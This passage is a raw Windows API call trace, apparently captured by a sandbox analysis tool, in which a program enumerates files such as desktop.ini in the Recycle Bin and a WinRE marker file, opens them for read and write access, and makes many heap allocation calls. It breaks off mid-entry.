1 [0060.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0060.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0060.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0060.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0060.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0060.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0060.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0060.092] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x7a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x82f00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x7a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="57", cAlternateFileName="")) returned 0 [0060.092] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0060.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0060.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0060.092] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.093] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.093] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0060.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0060.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0060.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0060.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0060.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.094] AreFileApisANSI () returned 1 [0060.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini", lpUsedDefaultChar=0x0) returned 74 [0060.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0060.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0060.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0060.094] AreFileApisANSI () returned 1 [0060.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0060.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x26df0 [0060.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x26df0, cchWideChar=74 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 74 [0060.094] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0060.094] GetFileType (hFile=0x410) returned 0x1 [0060.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0060.094] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.095] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.095] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.095] CloseHandle (hObject=0x410) returned 1 [0060.095] AreFileApisANSI () returned 1 [0060.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0060.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x26df0 [0060.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x26df0, cchWideChar=74 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 74 [0060.095] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0060.095] GetFileType (hFile=0x410) returned 0x1 [0060.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0060.095] CloseHandle (hObject=0x410) returned 1 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0060.097] AreFileApisANSI () returned 1 [0060.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0060.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x26df0 [0060.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x26df0, cchWideChar=74 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini") returned 74 [0060.097] GetFileAttributesExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81)) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0060.097] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.097] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.097] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x92, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x92, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="57", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓\x81")) returned 0 [0060.097] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0060.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0060.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0060.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0060.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76bd0 | out: hHeap=0x20000) returned 1 [0060.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0060.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0060.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0060.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0060.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0060.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0060.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.098] AreFileApisANSI () returned 1 [0060.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$WINRE_BACKUP_PARTITION.MARKER", lpUsedDefaultChar=0x0) returned 34 [0060.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0060.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0060.098] AreFileApisANSI () returned 1 [0060.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x690d0 [0060.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=34 | out: lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 34 [0060.099] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0060.100] GetFileType (hFile=0x40c) returned 0x1 [0060.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0060.100] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.100] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.100] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.100] CloseHandle (hObject=0x40c) returned 1 [0060.100] AreFileApisANSI () returned 1 [0060.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69170 [0060.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=34 | out: lpWideCharStr="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 34 [0060.101] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0060.101] GetFileType (hFile=0x40c) returned 0x1 [0060.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.101] CloseHandle (hObject=0x40c) returned 1 [0060.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0060.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0060.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0060.101] HeapFree (in: 